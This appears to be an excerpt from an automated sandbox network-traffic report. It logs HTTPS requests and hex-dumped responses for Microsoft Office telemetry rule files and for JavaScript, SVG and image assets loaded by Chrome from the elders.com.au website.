                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    133192.168.2.44991313.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:25 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:25 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 408
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                    ETag: "0x8DC582BB9B6040B"
                                                                                                                                    x-ms-request-id: 94271ffd-901e-0067-294a-2eb5cb000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080325Z-157b9fd754fgw9r7hC1SN1124c000000048g000000003ggu
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:26 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    134192.168.2.44991513.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:25 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:25 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 469
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                    ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                    x-ms-request-id: 9bbae5eb-d01e-002b-38f8-2e25fb000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080325Z-158dbd74bf4kn7x5hC1SN166t400000003pg0000000037cx
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:26 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    135192.168.2.449918162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC1052OUTGET /etc.clientlibs/el/clientlibs/clientlib-react.lc-2d7df618eb528a2ce626641aaccea776-lc.min.js HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
                                                                                                                                    2024-11-05 08:03:26 UTC630INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:26 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=2592000, immutable
                                                                                                                                    last-modified: Thu, 17 Oct 2024 04:33:47 GMT
                                                                                                                                    etag: W/"284252-2386f26fb1bdc0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-pao-kpao1770058-PAO
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1729139627.757671,VS0,VS0,VE1123
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 1068032
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ca395d6c19-DFW
                                                                                                                                    2024-11-05 08:03:26 UTC739INData Raw: 37 64 32 38 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 6e 2c 75 2c 69 3d 74 5b 30 5d 2c 63 3d 74 5b 31 5d 2c 61 3d 74 5b 32 5d 2c 70 3d 30 2c 73 3d 5b 5d 3b 70 3c 69 2e 6c 65 6e 67 74 68 3b 70 2b 2b 29 75 3d 69 5b 70 5d 2c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6f 2c 75 29 26 26 6f 5b 75 5d 26 26 73 2e 70 75 73 68 28 6f 5b 75 5d 5b 30 5d 29 2c 6f 5b 75 5d 3d 30 3b 66 6f 72 28 6e 20 69 6e 20 63 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 63 2c 6e 29 26 26 28 65 5b 6e 5d 3d 63 5b 6e 5d 29 3b 66 6f 72 28 66 26 26 66 28 74 29 3b 73 2e 6c 65 6e 67 74 68
                                                                                                                                    Data Ascii: 7d28!function(e){function t(t){for(var n,u,i=t[0],c=t[1],a=t[2],p=0,s=[];p<i.length;p++)u=i[p],Object.prototype.hasOwnProperty.call(o,u)&&o[u]&&s.push(o[u][0]),o[u]=0;for(n in c)Object.prototype.hasOwnProperty.call(c,n)&&(e[n]=c[n]);for(f&&f(t);s.length
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 2c 7b 76 61 6c 75 65 3a 22 4d 6f 64 75 6c 65 22 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 7d 2c 75 2e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 31 26 74 26 26 28 65 3d 75 28 65 29 29 2c 38 26 74 29 72 65 74 75 72 6e 20 65 3b 69 66 28 34 26 74 26 26 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 72 3d 4f 62 6a 65 63
                                                                                                                                    Data Ascii: of Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},u.t=function(e,t){if(1&t&&(e=u(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var r=Objec
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 6e 20 78 7d 29 29 2c 6e 2e 64 28 74 2c 22 63 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 29 29 3b 76 61 72 20 72 3d 6e 28 31 36 39 29 2c 6f 3d 6e 28 32 34 35 29 2c 69 3d 6e 28 39 29 3b 6c 65 74 20 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 28 29 7d 3b 76 61 72 20 73 3d 6e 28 31 29 3b 63 6f 6e 73 74 20 75 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2d 72 65 64 75 78 2d 63 6f 6e 74 65 78 74 22 29 2c 6c 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 65 3b 69 66 28 21 73 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 29 72 65 74 75 72 6e 7b 7d 3b 63 6f 6e 73 74 20 74 3d 6e 75 6c 6c 21
                                                                                                                                    Data Ascii: n x})),n.d(t,"c",(function(){return y}));var r=n(169),o=n(245),i=n(9);let a=function(e){e()};var s=n(1);const u=Symbol.for("react-redux-context"),l="undefined"!==typeof globalThis?globalThis:{};function c(){var e;if(!s.createContext)return{};const t=null!
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 7b 63 61 6c 6c 62 61 63 6b 3a 65 2c 6e 65 78 74 3a 6e 75 6c 6c 2c 70 72 65 76 3a 6e 7d 3b 72 65 74 75 72 6e 20 6f 2e 70 72 65 76 3f 6f 2e 70 72 65 76 2e 6e 65 78 74 3d 6f 3a 74 3d 6f 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 26 26 6e 75 6c 6c 21 3d 3d 74 26 26 28 72 3d 21 31 2c 6f 2e 6e 65 78 74 3f 6f 2e 6e 65 78 74 2e 70 72 65 76 3d 6f 2e 70 72 65 76 3a 6e 3d 6f 2e 70 72 65 76 2c 6f 2e 70 72 65 76 3f 6f 2e 70 72 65 76 2e 6e 65 78 74 3d 6f 2e 6e 65 78 74 3a 74 3d 6f 2e 6e 65 78 74 29 7d 7d 7d 7d 63 6f 6e 73 74 20 77 3d 7b 6e 6f 74 69 66 79 28 29 7b 7d 2c 67 65 74 3a 28 29 3d 3e 5b 5d 7d 3b 66 75 6e 63 74 69 6f 6e 20 45 28 65 2c 74 29 7b 6c 65 74 20 6e 2c 72 3d 77 2c 6f 3d 30 2c 69 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 6c 2e 6f 6e 53 74 61 74 65
                                                                                                                                    Data Ascii: {callback:e,next:null,prev:n};return o.prev?o.prev.next=o:t=o,function(){r&&null!==t&&(r=!1,o.next?o.next.prev=o.prev:n=o.prev,o.prev?o.prev.next=o.next:t=o.next)}}}}const w={notify(){},get:()=>[]};function E(e,t){let n,r=w,o=0,i=!1;function a(){l.onState
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 75 7d 2c 72 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 4f 28 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 66 3b 63 6f 6e 73 74 20 74 3d 65 3d 3d 3d 66 3f 64 3a 70 28 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 7b 73 74 6f 72 65 3a 65 7d 3d 74 28 29 3b 72 65 74 75 72 6e 20 65 7d 7d 63 6f 6e 73 74 20 6b 3d 4f 28 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                    Data Ascii: s.createElement(c.Provider,{value:u},r)};function O(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:f;const t=e===f?d:p(e);return function(){const{store:e}=t();return e}}const k=O();function C(){let e=arguments.length>0&&void 0!==arguments[
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 5b 5d 2c 61 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 73 3d 69 2e 73 6c 69 63 65 2c 75 3d 69 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 6c 3d 69 2e 70 75 73 68 2c 63 3d 69 2e 69 6e 64 65 78 4f 66 2c 66 3d 7b 7d 2c 70 3d 66 2e 74 6f 53 74 72 69 6e 67 2c 64 3d 66 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 68 3d 64 2e 74 6f 53 74 72 69 6e 67 2c 6d 3d 68 2e 63
                                                                                                                                    Data Ascii: eof window?window:this,(function(n,o){"use strict";var i=[],a=Object.getPrototypeOf,s=i.slice,u=i.flat?function(e){return i.flat.call(e)}:function(e){return i.concat.apply([],e)},l=i.push,c=i.indexOf,f={},p=f.toString,d=f.hasOwnProperty,h=d.toString,m=h.c
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 4f 2e 6d 61 70 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 65 2e 63 61 6c 6c 28 74 2c 6e 2c 74 29 7d 29 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 2c 66 69 72 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 30 29 7d 2c 6c 61 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 4f 2e 67 72 65 70 28 74 68 69
                                                                                                                                    Data Ascii: rn this.pushStack(O.map(this,(function(t,n){return e.call(t,n,t)})))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(O.grep(thi
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 45 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f 6e 63 65 7d 2c 6e 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 30 3b 69 66 28 6b 28 65 29 29 66 6f 72 28 6e 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 26 26 21 31 21 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 3b 72 2b 2b 29 3b 65 6c 73 65 20 66 6f 72 28 72 20 69 6e 20 65 29 69 66 28 21 31 3d 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 74 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 22 22 2c 72 3d 30 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 21 6f 29
                                                                                                                                    Data Ascii: 0},globalEval:function(e,t,n){E(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(k(e))for(n=e.length;r<n&&!1!==t.call(e[r],r,e[r]);r++);else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},text:function(e){var t,n="",r=0,o=e.nodeType;if(!o)
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 41 2b 22 2b 24 22 2c 22 67 22 29 3b 4f 2e 63 6f 6e 74 61 69 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 65 3d 3d 3d 6e 7c 7c 21 28 21 6e 7c 7c 31 21 3d 3d 6e 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 65 2e 63 6f 6e 74 61 69 6e 73 3f 65 2e 63 6f 6e 74 61 69 6e 73 28 6e 29 3a 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 6e 29 29 29 7d 3b 76 61 72 20 4c 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 78 38 30 2d 5c 75 46 46 46 46 5c 77 2d 5d 2f 67 3b 66 75 6e
                                                                                                                                    Data Ascii: ])(?:\\\\.)*)"+A+"+$","g");O.contains=function(e,t){var n=t&&t.parentNode;return e===n||!(!n||1!==n.nodeType||!(e.contains?e.contains(n):e.compareDocumentPosition&&16&e.compareDocumentPosition(n)))};var L=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\x80-\uFFFF\w-]/g;fun
                                                                                                                                    2024-11-05 08:03:26 UTC1369INData Raw: 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 41 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 41 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 41 2b 22 2a 5c 5c 29 7c 29 22 2c 22 69 22 29 2c 62 6f 6f 6c 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 22 2b 6b 2b 22 29 24 22 2c 22 69 22 29 2c 6e 65 65 64 73 43 6f 6e 74 65 78 74 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 41 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 41 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 41 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 71 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c
                                                                                                                                    Data Ascii: "*(even|odd|(([+-]|)(\\d*)n|)"+A+"*(?:([+-]|)"+A+"*(\\d+)|))"+A+"*\\)|)","i"),bool:new RegExp("^(?:"+k+")$","i"),needsContext:new RegExp("^"+A+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+A+"*((?:-\\d)?\\d*)"+A+"*\\)|)(?=[^-]|$)","i")},q=/^(?:input|


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    136192.168.2.449922162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC879OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-right-chevron-red.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"
                                                                                                                                    2024-11-05 08:03:26 UTC586INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:26 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"c6-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 56972
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210024-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730285984.525850,VS0,VS0,VE684
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ca39a946c6-DFW
                                                                                                                                    2024-11-05 08:03:26 UTC204INData Raw: 63 36 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 37 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 2e 30 35 38 38 35 20 36 4c 30 20 31 2e 31 30 30 33 35 4c 31 2e 31 33 36 33 34 20 30 4c 37 20 36 4c 31 2e 31 33 36 33 34 20 31 32 4c 30 20 31 30 2e 38 39 39 37 4c 35 2e 30 35 38 38 35 20 36 5a 22 20 66 69 6c 6c 3d 22 23 44 32 31 45 32 34 22 2f 3e 0a 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                    Data Ascii: c6<svg width="7" height="12" viewBox="0 0 7 12" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M5.05885 6L0 1.10035L1.13634 0L7 6L1.13634 12L0 10.8997L5.05885 6Z" fill="#D21E24"/></svg>
                                                                                                                                    2024-11-05 08:03:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    137192.168.2.449928162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC839OUTGET /content/dam/eld/icons---logos/icons/find-expert.png HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
